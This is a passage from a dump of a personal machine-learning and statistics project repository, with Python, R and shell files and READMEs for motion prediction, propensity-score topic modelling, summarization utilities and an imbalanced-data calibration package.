warnings\nwarnings.filterwarnings(\"ignore\")\n\nimport utils\nfrom models import LyftEffnet, LyftEffnetb7, LyftDensenet\nfrom utils import forward\n\n### =============== Configurations ============= ###\ncfg = {\n 'format_version': 4,\n 'data_path': \"input/lyft-motion-prediction-autonomous-vehicles\",\n 'save_dir': \"./save/\",\n 'name': 
'effnetb7',\n 'gpu_ids': [6],\n 'seed': 2048, \n 'load_path': \"./save/train/effnetb7-07/best.pth.tar\", \n 'model_params': {\n # 'model_architecture': 'resnet50',\n 'history_num_frames': 10,\n 'history_step_size': 1,\n 'history_delta_time': 0.1,\n 'future_num_frames': 50,\n 'future_step_size': 1,\n 'future_delta_time': 0.1,\n 'model_name': \"effnetb4\",\n 'lr': 1e-4,\n 'train': False,\n 'predict': True,\n },\n\n 'raster_params': {\n 'raster_size': [224, 224],\n 'pixel_size': [0.5, 0.5],\n 'ego_center': [0.25, 0.5],\n 'map_type': 'py_semantic',\n 'satellite_map_key': 'aerial_map/aerial_map.png',\n 'semantic_map_key': 'semantic_map/semantic_map.pb',\n 'dataset_meta_key': 'meta.json',\n 'filter_agents_threshold': 0.5\n },\n\n 'train_data_loader': {\n 'key': 'scenes/train_full.zarr',\n 'batch_size': 64, # 16\n 'shuffle': True,\n 'num_workers': 16 # 4\n },\n \n 'val_data_loader': {\n 'dir': 'input/lyft-motion-prediction-autonomous-vehicles/scenes/validate_chopped_100',\n 'key': 'scenes/validate_chopped_100/validate.zarr',\n 'batch_size': 64,\n 'shuffle': False,\n 'num_workers': 16 # 4\n },\n\n 'test_data_loader': {\n 'key': 'scenes/test.zarr',\n 'batch_size': 64,\n 'shuffle': False,\n 'num_workers': 16 # 4\n },\n\n 'train_params': {\n 'max_num_steps': 12000000,\n 'eval_steps': 160000,\n 'max_grad_norm': 3.0,\n }\n}\n\n\ndef main(cfg):\n\n # set logger, tensorboard, and devices\n cfg['save_dir'] = utils.get_save_dir(cfg['save_dir'], cfg['name'], training=False)\n log = utils.get_logger(cfg[\"save_dir\"], cfg[\"name\"])\n device = utils.get_devices(cfg[\"gpu_ids\"])\n cfg[\"test_data_loader\"][\"batch_size\"] *= max(1, len(cfg[\"gpu_ids\"]))\n \n log.info(f\"Cfg: {dumps(cfg, indent = 4, sort_keys = True)}\")\n\n # get model\n log.info(\"Building model...\")\n model = utils.init_model(cfg)\n model = nn.DataParallel(model, device_ids=cfg[\"gpu_ids\"])\n log.info(f\"Loading checkpoint from {cfg['load_path']}...\")\n model = utils.load_model(model, cfg[\"load_path\"], 
cfg[\"gpu_ids\"], return_step=False)\n model = model.to(device)\n model.eval()\n\n # get dataloader\n DIR_INPUT = cfg[\"data_path\"]\n os.environ[\"L5KIT_DATA_FOLDER\"] = DIR_INPUT\n dm = LocalDataManager(None)\n\n log.info(\"Building testing dataset...\")\n test_cfg = cfg[\"test_data_loader\"]\n rasterizer = build_rasterizer(cfg, dm)\n test_zarr = ChunkedDataset(dm.require(test_cfg[\"key\"])).open()\n test_mask = np.load(f\"{DIR_INPUT}/scenes/mask.npz\")[\"arr_0\"]\n test_dataset = AgentDataset(cfg, test_zarr, rasterizer, agents_mask=test_mask)\n test_dataloader = DataLoader(test_dataset,shuffle=test_cfg[\"shuffle\"],batch_size=test_cfg[\"batch_size\"],\n num_workers=test_cfg[\"num_workers\"])\n log.info(str(test_dataset))\n\n # Predict\n log.info(\"Predicting...\")\n # store information for evaluation\n future_coords_offsets_pd = []\n timestamps = []\n confidences_list = []\n agent_ids = []\n\n progress_bar = tqdm(test_dataloader)\n\n with torch.no_grad():\n for data in progress_bar:\n\n _, preds, confidences, _ = forward(data, model, device)\n\n #fix for the new environment\n preds = preds.cpu().numpy()\n world_from_agents = data[\"world_from_agent\"].numpy()\n centroids = data[\"centroid\"].numpy()\n \n # convert into world coordinates and compute offsets\n for idx in range(len(preds)):\n for mode in range(3):\n preds[idx, mode, :, :] = transform_points(preds[idx, mode, :, :], world_from_agents[idx]) - centroids[idx][:2]\n \n future_coords_offsets_pd.append(preds.copy())\n confidences_list.append(confidences.cpu().numpy().copy()) \n timestamps.append(data[\"timestamp\"].numpy().copy()) \n agent_ids.append(data[\"track_id\"].numpy().copy()) \n\n\n # create submission to submit to Kaggle\n pred_path = os.path.join(cfg['save_dir'], \"pred.csv\")\n log.info(f\"Writing prediction to {pred_path}.\")\n write_pred_csv(pred_path,\n timestamps=np.concatenate(timestamps), \n track_ids=np.concatenate(agent_ids), \n coords=np.concatenate(future_coords_offsets_pd),\n confs = 
np.concatenate(confidences_list)\n )\n\nif __name__ == '__main__':\n main(cfg)" }, { "alpha_fraction": 0.7407407164573669, "alphanum_fraction": 0.7555555701255798, "avg_line_length": 30.153846740722656, "blob_id": "64e8814912ad1c8e130d60a58943bab5998cfbaf", "content_id": "a0b412fc7de551109bf3d02745c392294eddc725", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 810, "license_type": "no_license", "max_line_length": 118, "num_lines": 26, "path": "/Learning_Rate/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "## Learning Rate Decaying Scheme Investigation\n\nThis is a class project for IE 8521 (Optimization). \n\nThis project investigates the effect of learning rate updating schemes on the convergence time and model performance. \n\nTeam Members: Liwei Huang and Yu Yang.\n\n#### Detail of sequences we considered:\n- seq1: 1/n\n- seq2: 1/sqrt(n)\n- seq3: 0.9^n\n- seq4: cyclic\n\n#### Detail of strategies we considered:\n- by epoch: update parameters every epoch.\n- by cutoff: update parameters if the loss is smaller than certain cutoff.\n- by oscillate: update parameters every time the validation loss increases.\n\n#### Optimizers we considered:\n- SGD\n- Adam\n\n#### Comparison\n- For every strategy, compare four sequences and benchmark.\n- Pick the best combination of each sequence, and compare with SGD benchmark and Adam benchmark.\n" }, { "alpha_fraction": 0.5946771502494812, "alphanum_fraction": 0.5966404676437378, "avg_line_length": 39.89285659790039, "blob_id": "263282c16a018309fcb45de80690aad7395b2e5a", "content_id": "078937f55a3fe32e487932f7dd26059f3ea1cb58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4584, "license_type": "no_license", "max_line_length": 134, "num_lines": 112, "path": "/textual_causality/etm-ps/data_utils.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", 
"text": "from torch.utils.data import Dataset\nimport os\nimport json\nimport torch\nfrom transformers import RobertaTokenizer\nfrom collections import Counter\nimport logging\nlogging.getLogger(\"transformers.tokenization_utils\").setLevel(logging.ERROR)\n\nclass CNNDM(Dataset):\n def __init__(self, fdir, model_type, is_test=False, total_len=512, ps_path=None):\n \"\"\" data format: article, abstract, [(candidiate_i, score_i)] \n ps_path: the learned propensity score dictionary json file.\n \"\"\"\n self.fdir = fdir\n self.indices = self.get_valid_indices()\n self.num = len(self.indices)\n self.is_test = is_test\n self.total_len = total_len\n self.tok = RobertaTokenizer.from_pretrained(model_type, verbose=False)\n self.pad_token_id = self.tok.pad_token_id\n self.cls_token_id = self.tok.cls_token_id\n self.sep_token_id = self.tok.sep_token_id\n self.keywords = [\"government\", \"crime\", \"economy\", \"game\", \"health\"]\n self.ps_path = ps_path\n\n def __len__(self):\n return self.num\n\n def get_valid_indices(self):\n \"\"\"There are some stories in the training set that have empty articles, which \n will lead to NaNs in training process if not removed. 
(an example is train/589.json)\n \"\"\"\n valid_indices = []\n for idx in range(len(os.listdir(self.fdir))):\n with open(os.path.join(self.fdir, f\"{idx}.json\"), \"r\") as f:\n data = json.load(f)\n if data[\"article\"] and data[\"abstract\"]:\n valid_indices.append(idx)\n return valid_indices\n\n def bert_encode(self, x, get_counters=False):\n _ids = self.tok.encode(x, add_special_tokens=False, truncation=False)\n ids = [self.cls_token_id]\n ids.extend(_ids[:self.total_len - 2])\n ids.append(self.sep_token_id)\n if get_counters:\n cnt = Counter(_ids)\n return ids, cnt, _ids\n else:\n return ids, _ids\n\n def __getitem__(self, idx):\n with open(os.path.join(self.fdir, f\"{self.indices[idx]}.json\"), \"r\") as f:\n data = json.load(f)\n article = data[\"article\"]\n src_input_ids, src_counters, _src_input_ids = self.bert_encode(\" \".join(article), get_counters=True)\n src_input_len = len(_src_input_ids)\n src_keywords_inclusion = [1 * (w in \" \".join(article)) for w in self.keywords]\n src_keywords_inclusion_type = int(\"\".join([str(x) for x in src_keywords_inclusion]), 2) # convert a binary list into a number\n abstract = data[\"abstract\"]\n tgt_input_ids, _ = self.bert_encode(\" \".join(abstract), get_counters=False)\n text_id = self.indices[idx]\n result = {\n \"src_input_ids\": src_input_ids, \n \"tgt_input_ids\": tgt_input_ids, \n \"src_counters\": src_counters, \n \"src_input_len\": src_input_len, \n \"src_keywords_inclusion_type\": src_keywords_inclusion_type, \n \"text_id\": text_id\n }\n if self.is_test:\n result[\"text\"] = data\n if self.ps_path:\n pass\n return result\n\n def select(self, indices):\n self.num = len(indices)\n self.indices = indices\n return self\n\ndef collate_mp(examples, pad_token_id, vocab_size, is_test=False):\n def bert_pad(sents):\n max_len = max(len(sent) for sent in sents)\n result = []\n for sent in sents:\n if len(sent) < max_len:\n sent.extend([pad_token_id] * (max_len - len(sent)))\n result.append(sent)\n return 
torch.LongTensor(result)\n\n def get_bows(counters, vocab_size):\n return torch.IntTensor([[cnt[i] for i in range(vocab_size)] for cnt in counters])\n\n src_input_ids = bert_pad([x[\"src_input_ids\"] for x in examples])\n tgt_input_ids = bert_pad([x[\"tgt_input_ids\"] for x in examples])\n src_bows = get_bows([x[\"src_counters\"] for x in examples], vocab_size)\n src_input_lens = torch.LongTensor([x[\"src_input_len\"] for x in examples])\n src_keywords_inclusion_types = torch.IntTensor([x[\"src_keywords_inclusion_type\"] for x in examples])\n text_ids = [x[\"text_id\"] for x in examples]\n result = {\n \"src_input_ids\": src_input_ids, \n \"tgt_input_ids\": tgt_input_ids, \n \"src_bows\": src_bows, # (batch_size, vocab_size)\n \"src_input_lens\": src_input_lens, \n \"src_keywords_inclusion_types\": src_keywords_inclusion_types, \n \"text_ids\": text_ids\n }\n if is_test:\n result['text'] = [x[\"text\"] for x in examples]\n return result \n\n\n\n" }, { "alpha_fraction": 0.42424243688583374, "alphanum_fraction": 0.5353535413742065, "avg_line_length": 23.75, "blob_id": "5b113823db75d7101017191770e23ae9f1610026", "content_id": "ccb17db70071c14fad2dca76f397cdeab12c1599", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 99, "license_type": "no_license", "max_line_length": 36, "num_lines": 4, "path": "/textual_causality/etm-ps/run_ps2.sh", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "python ./run_ps2.py \\\n --name ps2 \\\n --gpu_ids 0 1 2 3\\\n 2>&1 | tee logs/train_ps2_01.log\n" }, { "alpha_fraction": 0.6878727674484253, "alphanum_fraction": 0.7007952332496643, "avg_line_length": 37.653846740722656, "blob_id": "3cba0b6ac23a89d600f14f84c25eed02c35a496a", "content_id": "ee755f8a3eb5d7df8257ed8827fcf9290c9e746f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 1006, "license_type": "no_license", "max_line_length": 165, "num_lines": 26, 
"path": "/imbCalib/package/imbCalib/R/imbalance-data.R", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "#' Synthesized imbalanced data\n#'\n#' Data with 8 covariates and 1 binary response. The ratio of positive vs. negative class\n#' is 5:95. The positive label is 1.\n#'\n#' @docType data\n#'\n#' @usage data(imbalance)\n#'\n#' @keywords datasets\n#'\n#' @references \\href{https://scikit-learn.org/stable/modules/generated/sklearn.datasets.make_classification.html}{sklearn.datasets.make_classification documentation}\n#'\n#' @source \\href{https://raw.githubusercontent.com/yuyang-yy/materials/master/code/synthesize.py}{Python code to generate the data}\n#'\n#' @examples\n#' data(imbalance)\n#' set.seed(123)\n#' split <- sample.split(imbalance$y, SplitRatio = 0.75)\n#' train_set <- subset(imbalance, split == TRUE)\n#' test_set <- subset(imbalance, split == FALSE)\n#' X.test <- subset(test_set, select = -y)\n#' y.test <- subset(test_set, select = y)[,1]\n#' bag.prob.svm <- bagCalibrate(train_set, X.test, 'y', model='svm', type = 'C-classification', kernel = 'linear')\n#' stratifiedBrier(y.test, bag.prob.svm)\n\"imbalance\"\n\n" }, { "alpha_fraction": 0.6874625086784363, "alphanum_fraction": 0.7000600099563599, "avg_line_length": 49.51515197753906, "blob_id": "af7f4a454c9e932407ec59b762954b64200616e7", "content_id": "d6583631ae3e0cbf6446c9eb4b88ce3bc5d60db2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1667, "license_type": "no_license", "max_line_length": 117, "num_lines": 33, "path": "/textual_causality/etm-ps/get_ps.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "\"\"\"This file is to get the propensity scores dictionary.\"\"\"\nfrom transformers import RobertaTokenizer\nfrom functools import partial\nfrom data_utils import collate_mp, CNNDM\nfrom torch.utils.data import DataLoader\nfrom collections import Counter, OrderedDict\nfrom tqdm import 
tqdm\nfrom json import dump\n\nif __name__ == \"__main__\":\n\n tok = RobertaTokenizer.from_pretrained(\"roberta-base\")\n train_dataset = CNNDM(f\"/home/yang6367/summarizer/cnn-dailymail/processed/train\", \"roberta-base\", is_test=False)\n collate_fn = partial(collate_mp, pad_token_id=tok.pad_token_id, vocab_size=tok.vocab_size, is_test=False)\n train_dataloader = DataLoader(train_dataset, batch_size=256, shuffle=False, num_workers=4, collate_fn=collate_fn)\n \n doc_len_threshold = 800\n counter0 = Counter() # shorter than threshold\n counter1 = Counter() # longer than threshold\n with tqdm(total=len(train_dataloader.dataset)) as progress_bar:\n for batch in train_dataloader:\n src_input_lens = batch[\"src_input_lens\"]\n src_keywords_inclusion_types = batch[\"src_keywords_inclusion_types\"]\n counter0.update(src_keywords_inclusion_types[src_input_lens <= doc_len_threshold].tolist())\n counter1.update(src_keywords_inclusion_types[src_input_lens > doc_len_threshold].tolist())\n \n progress_bar.update(src_input_lens.size(0))\n\n propensity_scores = OrderedDict() \n for key in sorted(set(counter0.keys()) | set(counter1.keys())):\n propensity_scores[key] = counter1[key] / (counter0[key] + counter1[key])\n with open('save/propensity_scores.json', 'w') as f:\n dump(propensity_scores, f)\n" }, { "alpha_fraction": 0.4577150344848633, "alphanum_fraction": 0.4660393297672272, "avg_line_length": 40.641414642333984, "blob_id": "a5bb7c40ed4141ffee17ecc996516c79f58ce6a2", "content_id": "3d4f550979668431d962d8a4d5904c3556be9223", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8289, "license_type": "no_license", "max_line_length": 105, "num_lines": 198, "path": "/textual_causality/etm-ps/args.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "\"\"\"Command-line arguments.\nAdapted from SQuAD code.\n\"\"\"\n\nimport argparse\n\ndef get_train_args():\n \"\"\"Get arguments needed in 
train.py.\"\"\"\n parser = argparse.ArgumentParser('Train a ETM on CNNDM')\n\n add_train_test_args(parser)\n add_etm_args(parser)\n add_psmodel_args(parser)\n\n parser.add_argument('--seed',\n type=int,\n default=224,\n help='Random seed for reproducibility.')\n parser.add_argument('--ema_decay',\n type=float,\n default=0.999,\n help='Decay rate for exponential moving average of parameters.')\n parser.add_argument('--max_checkpoints',\n type=int,\n default=10,\n help='Maximum number of checkpoints to keep on disk.')\n parser.add_argument('--metric_name',\n type=str,\n default='BCE',\n choices=('BCE', 'ACC'), \n help='Name of validation metric to determine best checkpoint.')\n parser.add_argument('--optimizer',\n type=str,\n default='adam',\n choices=('adam', 'adagrad', 'adadelta', 'rmsprop', 'asgd', 'sgd'),\n help='Optimizer used in training.')\n parser.add_argument('--eval_steps',\n type=int,\n default=50000,\n help='Number of steps between successive evaluations.')\n parser.add_argument('--num_epochs',\n type=int,\n default=5,\n help='Number of epochs for which to train. 
Negative means forever.')\n parser.add_argument('--max_grad_norm',\n type=float,\n default=5.0,\n help='Maximum gradient norm for gradient clipping.')\n parser.add_argument('--lr',\n type=float,\n default=0.02,\n help='Learning rate.')\n parser.add_argument('--l2_wd',\n type=float,\n default=1.2e-6,\n help='L2 weight decay.')\n parser.add_argument('--drop_prob',\n type=float,\n default=0.2,\n help='Probability of zeroing an activation in dropout layers.')\n\n args = parser.parse_args() # can only be added at the last parser round\n\n if args.metric_name in ('BCE'):\n # Best checkpoint is the one that minimizes negative log-likelihood\n args.maximize_metric = False\n elif args.metric_name in ('ACC'):\n args.maximize_metric = True\n else:\n raise ValueError(f'Unrecognized metric name: \"{args.metric_name}\"')\n\n return args\n\n\ndef get_test_args():\n \"\"\"Get arguments needed in test.py.\"\"\"\n parser = argparse.ArgumentParser('Test a trained PS model on CNNDM')\n\n print(\"Loading train_test args...\")\n add_train_test_args(parser)\n print(\"Loading etm args...\")\n add_etm_args(parser)\n print(\"Loading psmode args...\")\n add_psmodel_args(parser)\n print(\"Loding ps sim args...\")\n add_ps_sim_args(parser)\n\n parser.add_argument('--split',\n type=str,\n default='test',\n choices=('train', 'val', 'test'),\n help='Split to use for testing.')\n\n # Require ps_load_path and etm_load_pathfor test.py\n args = parser.parse_args()\n if not args.ps_load_path:\n raise argparse.ArgumentError('Missing required argument --ps_load_path')\n if not args.etm_load_path:\n raise argparse.ArgumentError('Missing required argument --etm_load_path')\n\n return args\n\n\ndef add_train_test_args(parser):\n \"\"\"Add arguments common to train.py and test.py\"\"\"\n parser.add_argument('--save_dir',\n type=str,\n default='./save/',\n help='Base directory for saving information.')\n parser.add_argument('--name',\n '-n',\n type=str,\n required=True,\n help='Name to identify the 
model.')\n parser.add_argument('--gpu_ids',\n nargs='+',\n type=int,\n default=0, \n required=True,\n help='GPU ids. (ex. 3 4 5 6)') \n parser.add_argument('--batch_size',\n type=int,\n default=256,\n help='Batch size per GPU. Scales automatically when \\\n multiple GPUs are available.')\n parser.add_argument('--data_dir',\n type=str,\n default='/home/yang6367/summarizer/cnn-dailymail/processed', \n help='The processed CNNDM data directory.')\n parser.add_argument('--num_workers',\n type=int,\n default=4,\n help='Number of sub-processes to use per data loader.')\n\n\ndef add_etm_args(parser):\n parser.add_argument('--model_type',\n type=str,\n default='roberta-base', \n help='The type of Roberta model.') \n parser.add_argument('--num_topics',\n type=int,\n default=300, # when larger than vi_nn_hidden_size, there will be nans\n help='Number of topics for the ETM.') \n parser.add_argument('--vi_nn_hidden_size',\n type=int,\n default=800, \n help='Hidden layer size in the VI Neural Networks.') \n parser.add_argument('--theta_act',\n type=str,\n default='relu',\n choices=('relu', 'rrelu', 'leakyrelu', 'elu', 'selu', 'glu', 'tanh', 'softplus'),\n help='Activation function in the VI Nerual Networks.') \n parser.add_argument('--enc_drop',\n type=float,\n default=0.0, \n help='Dropout rate for the Encoder.') \n parser.add_argument('--etm_load_path',\n type=str,\n default=\"/home/yang6367/summarizer/etm/save/train/etm-01/best.pth.tar\",\n help='The trained ETM checkpoint.') \n parser.add_argument('--bow_norm',\n type=int,\n default=1, \n help='Whether to normalize the BOWs.') \n\n\ndef add_psmodel_args(parser):\n parser.add_argument('--doc_len_threshold',\n type=int,\n default=800,\n help='The document length threshold for treatment assignment.') \n parser.add_argument('--ps_load_path',\n type=str,\n default=\"\",\n help='The trained PSNet checkpoint.') \n parser.add_argument('--sim_data_path',\n type=str,\n default=\"\",\n help='The trained PSNet checkpoint.') \n\ndef 
add_ps_sim_args(parser):\n parser.add_argument('--alpha',\n type=float,\n default=-0.25,\n help='Alpha parameter for simulation.') \n parser.add_argument('--beta',\n type=float,\n default=5.0,\n help='Beta parameter for simulation.') \n parser.add_argument('--gamma',\n type=float,\n default=-5.0,\n help='Gamma parameter for simulation.') \n parser.add_argument('--ps_path',\n type=str,\n default=\"/home/yang6367/text-causal/etm/save/propensity_scores.json\",\n help='True propensity score path.') " }, { "alpha_fraction": 0.7695035338401794, "alphanum_fraction": 0.7695035338401794, "avg_line_length": 46.16666793823242, "blob_id": "e640b937623e7832e112a5c1b3a3a9ba7d61cf0e", "content_id": "7b48a17677b4c5e3c473118df8aed5f989c578ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 282, "license_type": "no_license", "max_line_length": 132, "num_lines": 6, "path": "/textual_causality/ate/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# ATE Estimation\n\nThis folder contains the scripts for simulation and ATE estimation. \n\n- `ate.R` simulates the data under two schemes, one controlling the mean of response while the other controls the ground-truth ATE. \n- `sim_data.csv` is the data copied from the `etm-ps` folder." 
}, { "alpha_fraction": 0.745110809803009, "alphanum_fraction": 0.7777053713798523, "avg_line_length": 62.91666793823242, "blob_id": "7c36a0bf25ba84c28c6e2a6efd43f67ac62cb9fc", "content_id": "4ea351dd2519498ec10babfb697b60ccaf39bd8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1534, "license_type": "no_license", "max_line_length": 335, "num_lines": 24, "path": "/MinneMUDAC/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "## MinneMUDAC 2019 Student Data Science Challenge\n\n**Team Name**: Women in Math and Stats\n\n**Team Members**: Somyi Baek, Cora Crown, Sarah Milstein, Yu Yang\n\n**Advisor**: Prof. Gilad Lerman\n\nThis repository contains the key part of the code I have written for the MinneMUDAC project and the presentation slides of our talks.\n\n`MUDAC Fall2019.pdf` introduces the problem and requirements of this data challenge.\n\n`spider.ipynb` crawls futures price data from https://www.mrci.com/ohlc/index.php. Note that there are some duplicate data. For example, data from [20161230](https://www.mrci.com/ohlc/2016/161230.php) is the same as [20170102](https://www.mrci.com/ohlc/2017/170102.php). Need to remove the duplicated values in preprocessing procedure.\n\n`tweet.ipynb` deals with tweet data. It uses LDA model to cluster tweet topics and thus obtains trade relavant and economy relavant tweets. Trump's tweet data is from http://www.trumptwitterarchive.com/archive. The result is shown in `tweetLDA11.html`.\n\n\n`ts-modeling.ipynb` tries time series modeling. It is mostly based on [mlcourse.ai](https://github.com/Yorko/mlcourse.ai/blob/master/jupyter_english/topic09_time_series/topic9_part1_time_series_python.ipynb).\n\n`models.ipynb` runs models on the stationarized data. Models include linear model, ridge regression, lasso regression, and XGBoost. 
Also, SHAP is used to interpret XGBoost model.\n\n`last-week-pred.ipynb` uses the last week as validation and make predictions on the last week.\n\n`next-week.ipynb` makes predictions for the desired upcoming week.\n" }, { "alpha_fraction": 0.6944290995597839, "alphanum_fraction": 0.6996690630912781, "avg_line_length": 34.20388412475586, "blob_id": "57934871260bf5a874a2036ae4b1ea6cb982d7fd", "content_id": "e58db1152ff5b9148317db23b27efad4a1bc1ad6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3626, "license_type": "permissive", "max_line_length": 100, "num_lines": 103, "path": "/rbm_summarizer/training_ptr_gen/train_util.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "from torch.autograd import Variable\nimport numpy as np\nimport torch\nfrom data_util import config\nfrom data_util import utils\nfrom train_textRBM.textRBM import TextRBM\nimport torch\n\ndef get_input_from_batch(batch, use_cuda, device='cpu'):\n batch_size = len(batch.enc_lens)\n\n enc_batch = Variable(torch.from_numpy(batch.enc_batch).long())\n enc_padding_mask = Variable(torch.from_numpy(batch.enc_padding_mask)).float()\n enc_lens = Variable(torch.from_numpy(batch.enc_lens)).int()\n extra_zeros = None\n enc_batch_extend_vocab = None\n\n if config.pointer_gen:\n enc_batch_extend_vocab = Variable(torch.from_numpy(batch.enc_batch_extend_vocab).long())\n # max_art_oovs is the max over all the article oov list in the batch\n if batch.max_art_oovs > 0:\n extra_zeros = Variable(torch.zeros((batch_size, batch.max_art_oovs)))\n\n c_t_1 = Variable(torch.zeros((batch_size, 2 * config.hidden_dim)))\n\n coverage = None\n if config.is_coverage:\n coverage = Variable(torch.zeros(enc_batch.size()))\n\n if use_cuda:\n enc_batch = enc_batch.to(device)\n enc_padding_mask = enc_padding_mask.to(device)\n enc_lens = enc_lens.to(device)\n\n if enc_batch_extend_vocab is not None:\n enc_batch_extend_vocab = 
enc_batch_extend_vocab.to(device)\n if extra_zeros is not None:\n extra_zeros = extra_zeros.to(device)\n c_t_1 = c_t_1.to(device)\n\n if coverage is not None:\n coverage = coverage.to(device)\n\n return enc_batch, enc_padding_mask, enc_lens, enc_batch_extend_vocab, extra_zeros, c_t_1, coverage\n\ndef get_output_from_batch(batch, use_cuda, device='cpu'):\n dec_batch = Variable(torch.from_numpy(batch.dec_batch).long())\n dec_padding_mask = Variable(torch.from_numpy(batch.dec_padding_mask)).float()\n dec_lens = batch.dec_lens\n max_dec_len = np.max(dec_lens)\n dec_lens_var = Variable(torch.from_numpy(dec_lens)).float()\n\n target_batch = Variable(torch.from_numpy(batch.target_batch)).long()\n\n if use_cuda:\n dec_batch = dec_batch.to(device)\n dec_padding_mask = dec_padding_mask.to(device)\n dec_lens_var = dec_lens_var.to(device)\n target_batch = target_batch.to(device)\n\n\n return dec_batch, dec_padding_mask, max_dec_len, dec_lens_var, target_batch\n\n\ndef get_rbm_input_from_batch(batch, vocab, use_cuda, device):\n ## step 1: get the cleaned word list for each document\n # convert the indices to words\n docs = [[vocab.id2word(i) for i in doc_ids ]for doc_ids in batch.enc_batch.tolist()]\n # remove stopwords, meaningless words, and do lemmatization\n docs = [utils.lemmatize(utils.clean(doc)) for doc in docs]\n # filter out the words that are not in the top15k\n docs = [utils.keep_top15k(doc) for doc in docs]\n\n ## step 2: transform the word list into a word-count vector\n docs_word_count = [utils.get_word_count(doc) for doc in docs]\n # transform the list to a tensor\n docs_word_count = Variable(torch.Tensor(docs_word_count).int())\n # docs_lens = docs_word_count.sum(-1)\n \n if use_cuda:\n docs_word_count = docs_word_count.to(device)\n # docs_lens = docs_lens.to(device)\n \n return docs_word_count\n\n\n# load the trained rbm model\nckpt_dict = torch.load(config.rbm_ckpt_path, map_location=\"cpu\")\nrbm = 
TextRBM(k=1)\nrbm.load_state_dict(ckpt_dict['model_state'])\n# device = utils.get_devices(config.gpu_ids)\n# rbm.to(device)\n\ndef get_rbm_output_from_batch(batch, vocab, use_cuda, device):\n \n docs_word_count = get_rbm_input_from_batch(batch, vocab, False, 'cpu').float()\n with torch.no_grad():\n _, sample_h = rbm.v_to_h(docs_word_count, docs_word_count.sum(-1).int())\n\n if use_cuda:\n sample_h = sample_h.to(device)\n\n return sample_h # B x latent_dim (200)\n" }, { "alpha_fraction": 0.7644991278648376, "alphanum_fraction": 0.76625657081604, "avg_line_length": 57.89655303955078, "blob_id": "582cad390472905f0f678d122b8bf3c68c839849", "content_id": "9718d0c2d2862ded055899b14b1dbcdb2830d659", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1707, "license_type": "no_license", "max_line_length": 212, "num_lines": 29, "path": "/textual_causality/etm-ps/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# ETM and Propensity Score Model\n\nThis folder contains python scripts for fitting the ETM model and the neural propensity score model. 
\n\n## Scripts\n- `args.py` specifies the arguments used in training and testing.\n- `data_utils.py` builds the CNNDM dataset.\n- `get_lens.py` loops over the whole CNNDM training set to get the document lengths, which is saved to `save/document_lengths.json`.\n- `get_ps.py` loops over the whole CNNDM training set to get the true propensity score dictionary, which is saved to `save/propensity_scores.json`.\n- `models.py` sets up the propensity score model structure and the ETM model structure.\n- `plot_lens.py` utilizes the document lengths generated by `get_lens.py` to plot the distribution of the lengths (saved to `save/doc_lens_hist.jpg`), so that we can have a better idea about the length threshold.\n- `run_etm.py` uses data parallelism to train the ETM model.\n- `run_ps.py` uses the weighted topic vector as the input to PSNet, which turns out to perform worse.\n- `run_ps2.py` uses the topic proportion vector as the input to PSNet, which has better prediction accuracy on the trainining and the validation set, so this model is the final model.\n- `test_ps2.py` applies the trained ETM model and the trained PSNet model to the training set to obtain the estimated propensity scores and generates the dataset (saved to `save/sim_data.py`) for simulation.\n- `utils.py` includes the utility functions for training and testing.\n\n\n## Training Details\nThe pink curves represent the PS model and the green curves represent PS2 model.\n\n### Training Loss\n![](save/train_loss.png)\n\n### Validation Accuracy\n![](save/val_accuracy.png)\n\n### Validation Loss\n![](save/val_loss.png)" }, { "alpha_fraction": 0.4941995441913605, "alphanum_fraction": 0.66434645652771, "avg_line_length": 29.785715103149414, "blob_id": "069b5cb6f639daae8894e85681a0bde237af925b", "content_id": "3a8f82e3a6ca1e0cb6676f448b096240ef7ad6b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 1293, "license_type": "no_license", "max_line_length": 98, 
"num_lines": 42, "path": "/imbCalib/package/imbCalib/tests/testthat/test-calibrate.R", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# simulated data for test\ny.true <- c(0, 0, 1, 1, 0, 1, 1, 0, 0, 0)\ny.prob <- c(0.45454545, 0.36363636, 0.63636364, 0.18181818, 0.45454545, 0.09090909,\n 0.27272727, 0.81818182, 0.63636364, 0.63636364)\n\n# load imbalance data\ndata(imbalance)\nset.seed(123)\nsplit <- sample.split(imbalance$y, SplitRatio = 0.75)\ntrain_set <- subset(imbalance, split == TRUE)\ntest_set <- subset(imbalance, split == FALSE)\nX.test <- subset(test_set, select = -y)\ny.test <- subset(test_set, select = y)[,1]\n\n\ntest_that(\"binProbs works\", {\n\n expect_equal(as.numeric(binProbs(y.true, y.prob)[[1]][1]), 1)\n expect_equal(as.numeric(binProbs(y.true, y.prob)[[2]][1]), 0.13636363499999998306)\n\n})\n\ntest_that(\"brier works\", {\n\n expect_equal(brier(y.true, y.prob), 0.41818181890909089660)\n\n})\n\ntest_that(\"stratifiedBrier works\", {\n\n 